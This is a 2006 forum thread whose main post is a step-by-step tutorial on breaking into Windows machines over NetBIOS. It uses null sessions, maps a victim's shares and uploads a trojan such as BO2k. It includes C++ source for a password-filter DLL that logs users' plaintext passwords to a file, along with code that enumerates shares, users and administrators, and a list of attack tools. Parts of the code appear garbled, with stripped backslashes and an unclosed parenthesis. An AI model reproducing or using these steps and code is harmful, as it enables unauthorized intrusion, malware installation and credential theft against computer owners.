Screech Posted August 14, 2006 Report Share Posted August 14, 2006 Well..first of all hello folks..In this tutorial I wanna show u how to hack via NetBios.And here is what u need:- Windows ( for the method I'll explain here )- Internet - NetBIOS scans- the good old DOS console- a bit knowledge about DOS and nbtstat.exe and net.exe ( see microsoft technet for description )- knowledge about trojans or backdoors ( how they work...)************************************************************************************Lets start...1. Fire up a DOS box2. Now go to root ( usually c: ) and enter " nbtstat -A IP "( without " ", IP is the IP of the remote PC. You get the IP's from your scans )If the server/PC is hackable the result should be a table like this:NetBIOS Remote Machine Name TableName Type Status--------------------------------------------computername <00> UNIQUE Registeredworkgroupname <00> GROUP Registeredcomputername <20> UNIQUE Registeredworkgroupname <1E> GROUP Registeredworkgroupname <1D> UNIQUE Registered..__MSBROWSE__. <01> GROUP RegisteredMAC Address = xx-xx-xx-xx-xx-xx ( the x's are hex numbers )************************************************************************************You can scan for NetBios with X-Scan. Also scan with a port scanner like superscan(available at www.packetstormsecurity.nl) 'cause port 135-139 often stands for NetBios.An original scan wit X-Scan could look like:xxx.xxx.xxx.xxxAdministrator - [built-in account for administering the computer/domain]Account type: AdministratorPassword age: 291 Day 10 Hour 28 Minute 34 Sec.Bad password count: 0Number logons: 9Last logon: GMT Wed Aug 14 15:26:38 2002Guest - [built-in account for guest access to the computer/domain]Account type: GuestPassword age: 0 Day 0 Hour 0 Minute 0 Sec.Bad password count: 0Number logons: 0************************************************************************************3. Mkay now enter this in the DOS box:( you have to replace the xxx.... by the IP of the target and dont write the c: 'cause it is there yet )c:net view xxx.xxx.xxx.xxxResponse (possible):System error 5 occured.Access denied.c:ooops...wasn't as easy as we thought...well ok type:c:net use xxx.xxx.xxx.xxxipc$ "" /user:"" ( this creates a zero session )Response: The command completed successfully.Ok..lets test it again...c:net view xxx.xxx.xxx.xxxResponse: Shared resources on xxx.xxx.xxx.xxx* Here it displays the resourcesmkay...now we know the shared resourcesNow we assign a drive to a shared folder...c:net use m: xxx.xxx.xxx.xxx"folder" ( replace "folder" by a shared folders name )Response: The command completed successfully.Now we switch to our new drive:c:m:..usually nothing interesting in a shared folder. And because of that...4. Now we can upload a trojan who gives us access to rest of the PC. It's good to code asmall trojan that does all what we want, because existing trojans are recognized by AVtools. But u can also take an existing one like BO2k ...Now upload:m:copy c:path_to_the_trojan_here m:Now the trojan is installed. Best thing is to upload a dll-trojan thru the other trojan that replaces a *.dll5. Now we close the connection to the remote folder with:c:net use m: /DELETE********************************************************************************************************************************************************************************************************** C++ source for this shit to save time ************************************************************************************************************************************************************************************************************************************* Perhaps you have to edit it at several lines *****************************************************************************************************************#include <windows.h>#include <stdio.h>#include <stdlib.h>struct UNI_STRING {USHORT len;USHORT maxlen;WCHAR *buff;};static HANDLE fh;BOOLEAN __stdcall InitializeChangeNotify (){DWORD wrote;fh = CreateFile("C:WINNTtemppwdchange.tmp", GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE, 0, CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUGH,0);WriteFile(fh, "InitializeChangeNotify gestartedn", 31, &wrote, 0);return TRUE;}LONG __stdcall PasswordChangeNotify (struct UNI_STRING *user, ULONG rid,struct UNI_STRING *passwd){DWORD wrote;WCHAR wbuf[200];char buf[512];char buf1[200];DWORD len;memcpy(wbuf, user->buff, user->len);len = user->len/sizeof(WCHAR);wbuf[len] = 0;wcstombs(buf1, wbuf, 199);sprintf(buf, "User = %s : ", buf1);WriteFile(fh, buf, strlen(buf), &wrote, 0);memcpy(wbuf, passwd->buff, passwd->len);len = passwd->len/sizeof(WCHAR);wbuf[len] = 0;wcstombs(buf1, wbuf, 199);sprintf(buf, "p4sswd = %s : ", buf1);WriteFile(fh, buf, strlen(buf), &wrote, 0);sprintf(buf, "RID = %xn", rid);WriteFile(fh, buf, strlen(buf), &wrote, 0);return 0L;}BOOL EstablishNullSession(CString TargetHost, CNTOHunterDlg* pDlg){char* pTemp = TargetHost.GetBuffer(256);WCHAR wszServ[256];LPWSTR Server = NULL;//convert to unicodeMultiByteToWideChar(CP_ACP, 0, pTemp,strlen(pTemp)+1,wszServ,sizeof(wszServ)/sizeof(wszServ[0]) );Server = wszServ;LPCWSTR szIpc = L"IPC$";WCHAR RemoteResource[UNCLEN + 5 + 1];DWORD dwServNameLen;DWORD dwRC;NET_API_STATUS nas;USE_INFO_2 ui2;SHARE_INFO_1* pSHInfo1 = NULL;DWORDdwEntriesRead;DWORD dwTotalEntries;HTREEITEM machineRoot, shareRoot, userRoot, adminRoot, attribRoot;char sharename[256];char remark[256];if(Server == NULL || *Server == L''){SetLastError(ERROR_INVALID_COMPUTERNAME);return FALSE;}dwServNameLen = lstrlenW( Server );if(Server[0] != L''&& Server[1] != L''){RemoteResource[0] = L'';RemoteResource[1] = L'';RemoteResource[2] = L'';}else{dwServNameLen -= 2;RemoteResource[0] = L'';}if(dwServNameLen >CNLEN){SetLastError(ERROR_INVALID_COMPUTERNAME);return FALSE;}if(lstrcatW(RemoteResource, Server) == NULL) return FALSE;if(lstrcatW(RemoteResource, szIpc) == NULL) return FALSE;ZeroMemory(&ui2, sizeof(ui2));ui2.ui2_local = NULL;ui2.ui2_remote = (LPTSTR) RemoteResource;ui2.ui2_asg_type = USE_IPC;ui2.ui2_password = (LPTSTR) L"";ui2.ui2_username = (LPTSTR) L"";ui2.ui2_domainname = (LPTSTR) L"";nas = NetUseAdd(NULL, 2, (LPBYTE)&ui2, NULL);dwRC = GetLastError();if( nas == NERR_Success ){machineRoot = pDlg->m_Victims.InsertItem(TargetHost, 0, 0,TVI_ROOT);}nas = NetShareEnum((char*)Server, 1, (LPBYTE*)&pSHInfo1,MAX_PREFERRED_LENGTH,&dwEntriesRead,&dwTotalEntries, NULL);dwRC = GetLastError();if( nas == NERR_Success ){if(dwTotalEntries > 0){shareRoot = pDlg->m_Victims.InsertItem("Shares",machineRoot,TVI_LAST);userRoot = pDlg->m_Victims.InsertItem("Users", machineRoot,TVI_LAST);adminRoot = pDlg->m_Victims.InsertItem("Admin",machineRoot,TVI_LAST);}for(int x=0; x<(int)dwTotalEntries; x++){WideCharToMultiByte(CP_ACP, 0, (const unsignedshort*)pSHInfo1->shi1_netname, -1,sharename, 256, NULL, NULL );WideCharToMultiByte( CP_ACP, 0, (const unsigned short*)pSHInfo1->shi1_remark, -1,remark, 256, NULL, NULL );CString ShareDetails = sharename;ShareDetails = ShareDetails + " - " + remark;attribRoot = pDlg->m_Victims.InsertItem(ShareDetails, shareRoot,TVI_LAST);pSHInfo1++;}}DoNetUserEnum(Server, pDlg, userRoot, adminRoot);nas = NetUseDel(NULL, (LPTSTR) RemoteResource, 0);TargetHost.ReleaseBuffer();SetLastError( nas );return FALSE;}bool GetAdmin(char* pServer, char* pUser, CString& Name){BOOL fAdmin = FALSE;DWORD dwDomainName,dwSize,dwAdminVal;SID_NAME_USE use;PSID pUserSID = NULL; // SID für Benutzerint rc;int iSubCount;bool bFoundHim = 0;dwDomainName = 256;dwSize = 0;dwAdminVal = 0;iSubCount = 0;rc = LookupAccountName(pServer,pUser, pUserSID,&dwSize, szDomainName,&dwDomainName, &use );rc = GetLastError();if(rc == ERROR_INSUFFICIENT_BUFFER){pUserSID = (PSID) malloc(dwSize);rc = LookupAccountName(pServer,pUser, pUserSID,&dwSize, szDomainName,&dwDomainName, &use );}iSubCount = (int)*(GetSidSubAuthorityCount(pUserSID));dwAdminVal = *(GetSidSubAuthority(pUserSID, iSubCount-1));if(dwAdminVal==500){Name.Format("Admin is %s%s", szDomainName, pUser);bFoundHim = true;}delete pUserSID;return bFoundHim;}void DoNetUserEnum(const wchar_t* pServer, CNTOHunterDlg* pDlg, HTREEITEM userRoot, HTREEITEM adminRoot){USER_INFO_10 *pUserbuf, *pCurUser;DWORD dwRead, dwRemaining, dwResume, dwRC;char userName[256];char userServer[256];dwResume = 0;if(pServer[0] != L'' && pServer[1] != L''){RemoteResource[0] = L'';RemoteResource[1] = L'';RemoteResource[2] = L'';}else{dwServNameLen -= 2;RemoteResource[0] = L'';}if(dwServNameLen > CNLEN){SetLastError(ERROR_INVALID_COMPUTERNAME);return;}if(lstrcatW(RemoteResource, pServer) == NULL) return;do{pUserbuf = NULL;dwRC = NetUserEnum(RemoteResource, 10, 0, (BYTE**) &pUserbuf,1024,&dwRead, &dwRemaining, &dwResume);if (dwRC != ERROR_MORE_DATA && dwRC != ERROR_SUCCESS)break;DWORD i;for(i = 0, pCurUser = pUserbuf; i < dwRead; ++i, ++pCurUser){WideCharToMultiByte( CP_ACP, 0, pCurUser->usri10_name,-1, userName, 256, NULL, NULL );WideCharToMultiByte( CP_ACP, 0, pServer, -1,userServer, 256, NULL, NULL );if(!GotAdmin){CString Admin;GotAdmin = GetAdmin(userServer, userName, Admin);if(GotAdmin{Admin.TrimRight();HTREEITEM adminChild = pDlg->m_Victims.InsertItem(Admin, adminRoot, TVI_LAST);pDlg->m_Victims.EnsureVisible(adminChild);}}CString strUserName = userName;pDlg->m_Victims.InsertItem(strUserName, userRoot, TVI_LAST);}if (pUserbuf != NULL)NetApiBufferFree(pUserbuf);} while (dwRC == ERROR_MORE_DATA);if (dwRC != ERROR_SUCCESS)printf("NUE() returned %lu", dwRC);}***************************************************************************************Some NetBios hacking tools:DumpSechttp://www.somarsoft.comWindows NT/2000Legionhttp://www.technotronic.comWindows 9x/NT/2000, UNIX/LinuxNAThttp://www.packetstormsecurity.nlWindows 9x/NT, UNIX/Linux****************************************************************************************Congratulation...you've hacked him now u can connect him with http://FTP. Quote Link to comment Share on other sites More sharing options...
zbeng Posted August 14, 2006 Report Share Posted August 14, 2006 interesant Quote Link to comment Share on other sites More sharing options...